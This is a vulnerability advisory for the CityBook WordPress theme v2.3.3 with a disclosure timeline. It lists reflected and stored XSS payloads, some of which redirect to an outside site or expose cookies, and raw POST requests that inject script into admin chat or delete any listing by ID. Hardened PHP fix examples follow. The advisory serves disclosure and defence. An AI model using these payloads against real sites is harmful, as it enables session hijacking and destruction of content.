Multiple vulnerabilities were discovered in the ‘CityBook - Directory & Listing WordPress Theme’, tested version: v2.3.3:
- Unauthenticated Reflected XSS
- Authenticated Persistent XSS
- IDOR

Edit (WPScanTeam):
December 27th, 2019 - Envato contacted
January 6th, 2020 - Envato investigating
January 7th, 2020 - v2.3.4 released
----[]- Info: -[]----
Google Dork: /wp-content/themes/citybook/
Date: 27/12/2019
Demo website: https://citybook2.cththemes.com/
Demo account: m0ze2/asdasd (login/password)
PoC listing: https://citybook2.cththemes.com/dashboard/?dashboard=listings
----[]- Reflected XSS: -[]----
The input field with placeholder «What are you looking for?» on the homepage is vulnerable. Any payload is triggered three times if it is prefixed with ">. The same applies to the regular search (the block next to the website logo).
Payload Sample #0: "><img src=x onerror=alert(document.cookie)>
Payload Sample #1: <img src=x onerror=alert(document.domain)>
Payload Sample #2: <img src=x onerror=window.location=`https://m0ze.ru`;>
PoC #0: https://citybook2.cththemes.com/?search_term=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.cookie%29%3E#038;location_search&nearby=off&address_lat&address_lng&distance=10&lcats%5B%5D=
PoC #1: https://citybook2.cththemes.com/?search_term=%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E&location_search=&nearby=off&address_lat=&address_lng=&distance=10&lcats%5B%5D=
PoC #2: https://citybook2.cththemes.com/?search_term=%22%3E%3Cimg+src%3Dx+onerror%3Dwindow.location%3D%60https%3A%2F%2Fm0ze.ru%60%3B%3E&location_search=&nearby=off&address_lat=&address_lng=&distance=10&lcats%5B%5D=
----[]- Persistent XSS -> Chat: -[]----
Any cookie-stealing payload can be used to hijack a user or administrator session, or to force a redirect to a malicious website (sent from https://citybook2.cththemes.com/dashboard/?dashboard=chats or from the chat widget in the bottom right corner).
Payload Sample #0: <img src=x onerror=alert(`m0ze`)>
Payload Sample #1: <img src=x onerror=window.location=`https://m0ze.ru`;>
PoC:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: citybook2.cththemes.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 172
Origin: https://citybook2.cththemes.com
DNT: 1
Connection: close
Referer: https://citybook2.cththemes.com/dashboard/?dashboard=chats
Cookie: wordpress_sec_54d435e7d6922c566192cbf944196731=m0ze%7C1577594557%7C8iIk54JQ5kAHa6T7JSiVvfOBTdqUbwjbQ4N5dlpeobY%7C405cfe7009dfb008514e88229282ad33155a10e3d6d1c666e2cee90970212542; tk_ai=woo%3AQQKdIMycj4rMbRJC%2BiDJmr%2FX; wordpress_logged_in_54d435e7d6922c566192cbf944196731=m0ze%7C1577594557%7C8iIk54JQ5kAHa6T7JSiVvfOBTdqUbwjbQ4N5dlpeobY%7Cbc01a1bfc8e119a186128f522382374eae5a7d80a044290cfd77280880c51de0
action=citybook_addons_chat_reply&_nonce=a75ac6298d&cid=1230&user_id=785&touid=1&reply_text=%3Cimg%20src%3Dx%20onerror%3Dwindow.location%3D%60https%3A%2F%2Fm0ze.ru%60%3B%3E
Where:
user_id=XXX (your own ID; in this example the account «m0ze» has ID 785);
touid=1 (the message receiver's ID; in this example ID 1 is the «admin» account);
reply_text=_payload_ (your payload text).
----[]- Persistent Self-XSS -> Profile: -[]----
Vulnerable input fields: «Phone» and «Address» (triggered only on the https://citybook2.cththemes.com/dashboard/?dashboard=profile page, and only for the current user).
Payload Sample #0: "><img src=x onerror=alert(document.cookie)>
Payload Sample #1: "><h1>Greetings from m0ze</h1>
Payload Sample #2: "><script>alert(`PoC`);</script>
----[]- Persistent XSS -> Listing page: -[]----
Add a new listing at https://citybook2.cththemes.com/submit/ (the first time, you need to order the «Free» plan and then return to this URL).
Vulnerable input fields: «Listing Address», «Listing Latitude», «Listing Longitude», «Email Address», «Description». «Trainers» section: «Add Member» option with «Name», «Job or Position» and «Description» vulnerable input fields. «Additional Services Fees» section: «Add Service» option with «Service Name» vulnerable input field. «Listing Address» payload also works on the admin dashboard, so it's possible to steal administrator cookies.
Payload Sample #0: "><img src=x onerror=alert(document.cookie)>
Payload Sample #1: "><h1>Greetings from m0ze</h1>
Payload Sample #2: "><script>alert(`PoC`);</script>
PoC:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: citybook2.cththemes.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------18467633426500
Content-Length: 5848
Origin: https://citybook2.cththemes.com
DNT: 1
Connection: close
Referer: https://citybook2.cththemes.com/edit-listing/?listing_id=7610
Cookie: wordpress_sec_54d435e7d6922c566192cbf944196731=m0ze2%7C1577601272%7CzdPIIYkbIF1EvBpygfJo6Sp9MO5rD5h2FRb0kSFOkb5%7C62973039250bcf64067f2d87460bc142bfc1a6623ea7c5a57cc973245fff0a97; tk_ai=woo%3AQQKdIMycj4rMbRJC%2BiDJmr%2FX; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_54d435e7d6922c566192cbf944196731=m0ze2%7C1577601272%7CzdPIIYkbIF1EvBpygfJo6Sp9MO5rD5h2FRb0kSFOkb5%7C1790d7d33689fe6e21ffc2bcd001af3aa10e523b5a701b6f02944a4dd965f170; wp-settings-788=editor%3Dhtml; wp-settings-time-788=1577428516
-----------------------------18467633426500
Content-Disposition: form-data; name="lid"
7610
-----------------------------18467633426500
Content-Disposition: form-data; name="listing_type_id"
4901
-----------------------------18467633426500
Content-Disposition: form-data; name="isSubmit"
true
-----------------------------18467633426500
Content-Disposition: form-data; name="hasError"
false
-----------------------------18467633426500
Content-Disposition: form-data; name="title"
PoC
-----------------------------18467633426500
Content-Disposition: form-data; name="content"
<p><h1 style="font-size:68px;background:black;color:red;">Greetings from m0ze</h1></p>
-----------------------------18467633426500
Content-Disposition: form-data; name="thumbnail[0]"
-----------------------------18467633426500
Content-Disposition: form-data; name="cats[0]"
50
-----------------------------18467633426500
Content-Disposition: form-data; name="tags"
-----------------------------18467633426500
Content-Disposition: form-data; name="locations"
US|
-----------------------------18467633426500
Content-Disposition: form-data; name="features[0]"
64
-----------------------------18467633426500
Content-Disposition: form-data; name="features[1]"
84
-----------------------------18467633426500
Content-Disposition: form-data; name="features[2]"
66
-----------------------------18467633426500
Content-Disposition: form-data; name="features[3]"
76
-----------------------------18467633426500
Content-Disposition: form-data; name="working_hours[timezone]"
America/New_York
-----------------------------18467633426500
Content-Disposition: form-data; name="working_hours[Monday][static]"
enterHours
-----------------------------18467633426500
Content-Disposition: form-data; name="working_hours[Tuesday][static]"
enterHours
-----------------------------18467633426500
Content-Disposition: form-data; name="working_hours[Wednesday][static]"
enterHours
-----------------------------18467633426500
Content-Disposition: form-data; name="working_hours[Thursday][static]"
enterHours
-----------------------------18467633426500
Content-Disposition: form-data; name="working_hours[Friday][static]"
enterHours
-----------------------------18467633426500
Content-Disposition: form-data; name="working_hours[Saturday][static]"
enterHours
-----------------------------18467633426500
Content-Disposition: form-data; name="working_hours[Sunday][static]"
enterHours
-----------------------------18467633426500
Content-Disposition: form-data; name="ltags_names"
m0ze
-----------------------------18467633426500
Content-Disposition: form-data; name="post_excerpt"
"><h1>Greetings from m0ze</h1>
-----------------------------18467633426500
Content-Disposition: form-data; name="contact_infos_address"
<!--<img src="--><img src=x onerror=(alert)(`m0zeAddr`)//">
-----------------------------18467633426500
Content-Disposition: form-data; name="contact_infos_latitude"
<!--<img src="--><img src=x onerror=(alert)(`m0zeLat`)//">
-----------------------------18467633426500
Content-Disposition: form-data; name="contact_infos_longitude"
<!--<img src="--><img src=x onerror=(alert)(`m0zeLng`)//">
-----------------------------18467633426500
Content-Disposition: form-data; name="gmap"
-----------------------------18467633426500
Content-Disposition: form-data; name="contact_infos_email"
<!--<img src="--><img src=x onerror=(alert)(`m0ze`)//">
-----------------------------18467633426500
Content-Disposition: form-data; name="contact_infos_phone"
-----------------------------18467633426500
Content-Disposition: form-data; name="contact_infos_website"
-----------------------------18467633426500
Content-Disposition: form-data; name="price_range"
moderate
-----------------------------18467633426500
Content-Disposition: form-data; name="price_from"
-
-----------------------------18467633426500
Content-Disposition: form-data; name="price_to"
-
-----------------------------18467633426500
Content-Disposition: form-data; name="listing_dates"
-----------------------------18467633426500
Content-Disposition: form-data; name="listing_dates_show_metas"
-----------------------------18467633426500
Content-Disposition: form-data; name="lservices[0][service_id]"
--imgsrc---imgsrcxonerroralertm0ze88-
-----------------------------18467633426500
Content-Disposition: form-data; name="lservices[0][service_name]"
<!--<img src="--><img src=x onerror=(alert)(`ServiceName`)//">
-----------------------------18467633426500
Content-Disposition: form-data; name="lservices[0][service_desc]"
-----------------------------18467633426500
Content-Disposition: form-data; name="lservices[0][service_price]"
-
-----------------------------18467633426500
Content-Disposition: form-data; name="lmember[0][name]"
<!--<img src="--><img src=x onerror=(alert)(`Membername`)//">
-----------------------------18467633426500
Content-Disposition: form-data; name="lmember[0][job]"
<!--<img src="--><img src=x onerror=(alert)(`MemberJob`)//">
-----------------------------18467633426500
Content-Disposition: form-data; name="lmember[0][desc]"
<!--<img src="--><img src=x onerror=(alert)(`MemberDesc`)//">
-----------------------------18467633426500
Content-Disposition: form-data; name="action"
submit_listing
-----------------------------18467633426500
Content-Disposition: form-data; name="_wpnonce"
82b818f99a
-----------------------------18467633426500--
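The reflected search_term, the stored chat reply_text and the listing fields above share one root cause: user input is written into HTML without escaping for the context it lands in. The following is an added example of the fix, not the theme's code; the function names, the nonce action name and the text domain are assumptions.

```php
<?php
// Added example, not the theme's code: hardened output for the search box
// and a hardened chat reply handler. Function names and the nonce action
// name ('citybook_chat_nonce') are hypothetical.

// Reflected XSS: search_term is echoed into the value="..." attribute of the
// search input, so a payload starting with "> closes the attribute and the
// tag. In attribute context the value must pass through esc_attr().
function citybook_example_search_input() {
    $term = isset( $_GET['search_term'] )
        ? sanitize_text_field( wp_unslash( $_GET['search_term'] ) )
        : '';
    // esc_attr() converts " < > & to entities, so "> cannot break out.
    printf(
        '<input type="text" name="search_term" placeholder="%s" value="%s">',
        esc_attr__( 'What are you looking for?', 'citybook' ),
        esc_attr( $term )
    );
}

// Stored XSS via chat: reply_text is saved and later rendered in the
// recipient's dashboard (the admin's, in the PoC). Strip markup when it is
// stored and escape again when it is rendered.
add_action( 'wp_ajax_citybook_addons_chat_reply', 'citybook_example_chat_reply' );
function citybook_example_chat_reply() {
    check_ajax_referer( 'citybook_chat_nonce', '_nonce' );

    // Take the sender from the session, not from a user_id field in the POST.
    $from = get_current_user_id();
    $to   = isset( $_POST['touid'] ) ? absint( $_POST['touid'] ) : 0;
    $text = isset( $_POST['reply_text'] )
        ? sanitize_text_field( wp_unslash( $_POST['reply_text'] ) )
        : '';
    if ( ! $from || ! $to || '' === $text ) {
        wp_send_json_error( 'missing sender, recipient or message', 400 );
    }

    // The theme's storage call is not on the page; whatever saves the message
    // should receive $text, which is already plain text (tags stripped).
    $stored = $text;

    // Render for the HTML context: a stored value is still untrusted on output.
    wp_send_json_success( array(
        'from' => $from,
        'to'   => $to,
        'html' => '<p class="chat-msg">' . esc_html( $stored ) . '</p>',
    ) );
}
```

The same two steps (sanitize on the way in, escape for the exact output context on the way out) apply to the profile and listing fields; the listing address must be escaped both where the public listing renders it and where the admin dashboard renders it.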
----[]- IDOR #0: -[]----
Delete any post/page/listing:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: citybook2.cththemes.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 84
Origin: https://citybook2.cththemes.com
DNT: 1
Connection: close
Referer: https://citybook2.cththemes.com/dashboard/?dashboard=listings
Cookie: wordpress_sec_54d435e7d6922c566192cbf944196731=m0ze%7C1577577435%7CCetjW0nljmUkpvT20iPGzGootvMteHZr11imzXOb9e1%7C5958646454ea6fce0436f799b43314427bbf1336415aedc7eccfc1327da8c45f; tk_ai=woo%3AQQKdIMycj4rMbRJC%2BiDJmr%2FX; wordpress_logged_in_54d435e7d6922c566192cbf944196731=m0ze%7C1577577435%7CCetjW0nljmUkpvT20iPGzGootvMteHZr11imzXOb9e1%7C073f75d0412d7acbadd7fbc55d1524cf46e4625206c12b0832694ad3bb96689d; wp-settings-785=libraryContent%3Dbrowse%26editor%3Dhtml; wp-settings-time-785=1577404779
Pragma: no-cache
Cache-Control: no-cache
lid=1770&action=citybook_addons_delete_listing&_nonce=ffb1991cee&_wpnonce=ffb1991cee
Where:
lid=XXXX (the unique WordPress ID of the page/post/listing; it can be read from the classes WordPress adds to the <body> tag).
----[]- IDOR #1: -[]----
Remove the «Featured» option for any listing:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: citybook2.cththemes.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 101
Origin: https://citybook2.cththemes.com
DNT: 1
Connection: close
Referer: https://citybook2.cththemes.com/dashboard/?dashboard=listings
Cookie: wordpress_sec_54d435e7d6922c566192cbf944196731=m0ze%7C1577577435%7CCetjW0nljmUkpvT20iPGzGootvMteHZr11imzXOb9e1%7C5958646454ea6fce0436f799b43314427bbf1336415aedc7eccfc1327da8c45f; tk_ai=woo%3AQQKdIMycj4rMbRJC%2BiDJmr%2FX; wordpress_logged_in_54d435e7d6922c566192cbf944196731=m0ze%7C1577577435%7CCetjW0nljmUkpvT20iPGzGootvMteHZr11imzXOb9e1%7C073f75d0412d7acbadd7fbc55d1524cf46e4625206c12b0832694ad3bb96689d; wp-settings-785=libraryContent%3Dbrowse%26editor%3Dhtml; wp-settings-time-785=1577404779
lid=1739&lfeatured=true&action=citybook_addons_featured_listing&_nonce=ffb1991cee&_wpnonce=ffb1991cee
Where:
lid=XXXX (the unique WordPress ID of the page/post/listing; it can be read from the classes WordPress adds to the <body> tag).
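Both IDOR requests carry a valid nonce, which only proves the request was issued from the dashboard page; it does not say who is allowed to act on which listing. The following is an added example of handlers that add that authorization check, not the theme's code; the nonce action name, the listing post type name and the featured meta key are assumptions, and the capability checks assume the listing post type maps its capabilities like ordinary posts.

```php
<?php
// Added example, not the theme's code. Assumed: nonce action
// 'citybook_listing_nonce', post type 'listing', meta key '_listing_featured'.
add_action( 'wp_ajax_citybook_addons_delete_listing', 'citybook_example_delete_listing' );
function citybook_example_delete_listing() {
    // CSRF protection only: a nonce never authorizes the action itself.
    check_ajax_referer( 'citybook_listing_nonce', '_nonce' );

    $lid  = isset( $_POST['lid'] ) ? absint( $_POST['lid'] ) : 0;
    $post = $lid ? get_post( $lid ) : null;

    // Restrict the handler to listings: the PoC removed arbitrary posts and
    // pages because any ID was accepted.
    if ( ! $post || 'listing' !== $post->post_type ) {
        wp_send_json_error( 'not a listing', 404 );
    }
    // Authorization on the specific object: delete_post is a meta capability
    // that resolves to the caller's own listings for ordinary users and to all
    // listings for administrators.
    if ( ! current_user_can( 'delete_post', $post->ID ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    if ( ! wp_trash_post( $post->ID ) ) {
        wp_send_json_error( 'delete failed', 500 );
    }
    wp_send_json_success( array( 'lid' => $post->ID ) );
}

// Same pattern for the featured flag: checking edit_post on the specific
// listing stops a user from toggling someone else's listing.
add_action( 'wp_ajax_citybook_addons_featured_listing', 'citybook_example_featured_listing' );
function citybook_example_featured_listing() {
    check_ajax_referer( 'citybook_listing_nonce', '_nonce' );

    $lid  = isset( $_POST['lid'] ) ? absint( $_POST['lid'] ) : 0;
    $post = $lid ? get_post( $lid ) : null;
    if ( ! $post || 'listing' !== $post->post_type ) {
        wp_send_json_error( 'not a listing', 404 );
    }
    if ( ! current_user_can( 'edit_post', $post->ID ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    $featured = isset( $_POST['lfeatured'] ) && 'true' === $_POST['lfeatured'];
    update_post_meta( $post->ID, '_listing_featured', $featured ? '1' : '0' );
    wp_send_json_success( array( 'lid' => $post->ID, 'featured' => $featured ) );
}
```

Whether a listing owner may change the featured flag at all is a product decision; if only staff should, replace the edit_post check with a role capability such as manage_options.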